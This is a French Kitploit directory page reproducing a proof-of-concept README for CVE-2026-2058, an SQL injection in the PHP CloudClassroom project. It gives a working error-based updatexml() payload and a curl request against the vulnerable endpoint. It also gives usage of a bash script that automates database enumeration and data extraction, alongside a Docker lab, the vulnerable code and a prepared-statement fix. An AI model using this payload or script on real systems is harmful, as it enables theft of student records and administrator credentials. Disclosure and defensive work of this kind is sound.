Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-2058-PoC — Preuve de concept d'exploitation pour CVE-2026-2058, une injection SQL dans le projet PHP CloudClassroom, avec énumération automatisée de la base de données et extraction de données. | Kitploit
Outils/GitHubGitHub/carlosalbertotuma/cve-2026-2058-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebApprentissage et ÉducationLabs et Pratique
GitHubcarlosalbertotuma/cve-2026-2058-poc

CVE-2026-2058-PoC

Preuve de concept d'exploitation pour CVE-2026-2058, une injection SQL dans le projet PHP CloudClassroom, avec énumération automatisée de la base de données et extraction de données.

Voir le dépôt
il y a 5 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-2058-PoC – Injection SQL du projet PHP CloudClassroom

Aperçu

Une vulnérabilité d'injection SQL existe dans la fonctionnalité Post Query du projet PHP CloudClassroom (v1.0).

La vulnérabilité permet aux attaquants d'injecter des commandes SQL arbitraires via le paramètre POST squeryx, conduisant à l'énumération de la base de données et à l'extraction de données.

Ce dépôt contient un Proof of Concept (PoC) démontrant comment la vulnérabilité peut être exploitée pour extraire des données sensibles de la base de données backend.


Informations sur la vulnérabilité

ChampValeur
CVECVE-2026-2058
Type de vulnérabilitéInjection SQL
CWECWE-89
Logiciel concernéProjet PHP CloudClassroom
Version concernée1.0
ComposantFonctionnalité Post Query
Vecteur d'attaqueÀ distance
Authentification requiseNon
ImpactDivulgation de la base de données
SévéritéÉlevée
Référence du modèle d'attaqueCAPEC-66

Point de terminaison vulnérable

root@kitploit:~
POST /postquerypublic

Paramètre vulnérable

root@kitploit:~
squeryx

Cause racine

Le code backend concatène directement l'entrée utilisateur dans une requête SQL sans assainissement approprié ni requêtes paramétrées.

Exemple de code vulnérable :

root@kitploit:~
$sql = "INSERT INTO query(Query, Eid) VALUES ('$tempsquery','$tempseid')";

Étant donné que $tempsquery est dérivé de l'entrée utilisateur, les attaquants peuvent injecter du SQL arbitraire.


Configuration de laboratoire vulnérable (Docker)

À des fins de test et de recherche, un environnement Docker vulnérable est disponible.

Exécuter l'application vulnérable

root@kitploit:~
docker run -d --name cloudclassroom-lab -p 9292:80 bladscan/cloudclassroom-sqli:1.0

Proof of Concept

La vulnérabilité peut être déclenchée à l'aide d'une technique d'injection SQL basée sur les erreurs exploitant la fonction updatexml() de MySQL.

Exemple de charge utile :

root@kitploit:~
a' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) AND '1'='1

Exploitation manuelle

Exemple de requête curl :

root@kitploit:~
curl -X POST http://TARGET/postquerypublic \
-H "Content-Type: application/x-www-form-urlencoded" \
--data-urlencode "gnamex=test" \
--data-urlencode "[email protected]" \
--data-urlencode "squeryx=a' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) AND '1'='1" \
--data-urlencode "update=Post Query!"

Réponse attendue :

root@kitploit:~
XPATH syntax error: '~cc_db~'

Script d'exploitation

Ce dépôt inclut un script d'exploitation bash qui automatise :

  • L'extraction du nom de la base de données
  • L'énumération des tables
  • L'énumération des colonnes
  • L'extraction des données des tables

Utilisation

root@kitploit:~
chmod +x cloudclassroom_sqli_exploit.sh

./cloudclassroom_sqli_exploit.sh http://TARGET/postquerypublic

Exemple :

root@kitploit:~
./cloudclassroom_sqli_exploit.sh http://192.168.1.10/postquerypublic

Impact

Un attaquant peut :

  • Énumérer la structure de la base de données
  • Extraire des données sensibles
  • Récupérer les identifiants administrateur
  • Accéder aux dossiers des étudiants
  • Compromettre entièrement la base de données backend

Score CVSS

NIST NVD

  • Score de base : 9.8 (CRITIQUE)
  • Vecteur : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CNA (VulDB)

  • Score de base : 7.3 (ÉLEVÉ)
  • Vecteur : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

⚠️ Remarque : Le score CVSS de la NVD diffère du score CNA (VulDB) en raison d'évaluations d'impact différentes.


EPSS (Exploit Prediction Scoring System)

Le système de prédiction de score d'exploitation (EPSS) estime la probabilité qu'une vulnérabilité soit exploitée dans la nature.

CVEProbabilité EPSSPercentileDate
CVE-2026-20580.000287.62 %2026-03-01

Source : Ensemble de données FIRST EPSS


Atténuation

Les développeurs devraient :

  • Utiliser des requêtes préparées
  • Mettre en œuvre une validation des entrées
  • Échapper correctement les entrées utilisateur
  • Appliquer des autorisations de base de données au moindre privilège

Exemple d'implémentation sécurisée :

root@kitploit:~
$stmt = $conn->prepare("INSERT INTO query(Query, Eid) VALUES (?, ?)");
$stmt->bind_param("ss", $tempsquery, $tempseid);
$stmt->execute();

Captures d'écran

Exploitation de l'injection SQL

image

image

Références

  • https://cwe.mitre.org/data/definitions/89.html
  • https://owasp.org/Top10/2025/A05_2025-Injection/
  • https://capec.mitre.org/data/definitions/66.html
  • https://github.com/OWASP/www-project-web-security-testing-guide/blob/master/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection.md

Avertissement

Cet exploit est fourni uniquement à des fins éducatives et de recherche.

L'auteur n'est pas responsable de l'utilisation abusive ou des dommages causés par ce code.


Auteur

bl4dsc4n

Chercheur en sécurité

Télécharger l’outil